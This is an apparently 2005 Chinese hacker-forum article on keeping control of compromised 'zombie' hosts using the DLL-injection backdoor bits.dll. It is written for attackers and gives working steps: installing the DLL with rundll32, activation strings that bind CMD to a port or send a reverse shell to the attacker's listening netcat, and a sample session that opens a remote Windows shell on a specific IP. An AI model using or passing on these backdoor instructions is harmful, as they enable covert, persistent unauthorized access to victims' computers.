| 如何保护肉鸡 |
| 责任编辑:admin 更新日期:2005-7-6 |
|
|
来源:http://www.222.com.cn/
随着国内网民的安全意识的提高我们的肉鸡很难在得手了.即使到手也会在很短的时间内丢失,使众黑客们心痛至极.然后想尽一切办法为肉鸡安装多个后门添加N个隐藏管理员但还是被强力的杀毒软件或聪明的网管让我们宝贝在次的丢失.但是黑民们要记住在黑客界每天都有新的技术出现.下面我就向大家介绍一种很好的后门技术DLL插入型后门.它的好处就是不会开放端口.不会在进程中出现.很多黑民们都会有疑问dll怎么实现后门的呢 .dll又不是exe程序可以启动怎么会有这么大的功能呢.答:因为dll后门不是靠自身启动的.大家应该知道exe程序在运行的时候可以调用dll文件..哪么程序员在写程序的时候只要在dll中修改一些变量就可以将dll绑定到一些系统的服务中启到后门的作用.下面我就介绍一个国内著名黑客小榕的dll后门作品bits.dll其实使用很简单
首先将bits.dll上传到肉鸡上使用administrator或者localsysytem进行
安装
使用命令:rundll32.exe BITS.dll,Install <Active Strings>
Active Strings是用户自己指定的一个特征字符串,用于激活BITS。
安装成功后就可以进行联接了
正向连接:
1、用nc连接目标主机的任何一个TCP端口(80/139/445.....)
2、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[xell]:<PORT>
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99:
BITS Door@dancewithdolphin[xell]:99
这样目标主机就会将CMD绑定在99。
3、连接目标主机的指定端口(上例中为99)
反向连接:
很多情况下主机是在防火墙后面的,这样就需要用反向连接。
1、在本地使用NC监听(如:nc -l -p 1234)
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....)
3、按照以下格式输入激活命令
<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port>
例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234
端口监听:
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234
4、目标主机的CMD将会出现在NC监听的端口1234。
注意:所有的输入都区分大小写。
例:
C:\My Documents>nc 219.237.63.199 139
securitystrings@dancewithdolphin[xell]:7
?
C:\My Documents>nc 219.237.63.199 7
廙icrosoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
祝大家好运
注:如果有什么地方写错了请高手们指出
 |
|
| 上一篇文章: L-BLOG重大安全漏洞的描述及补丁 |
| 下一篇文章: DVBBS上传ASP文件漏洞详解 |
|
|
|
|
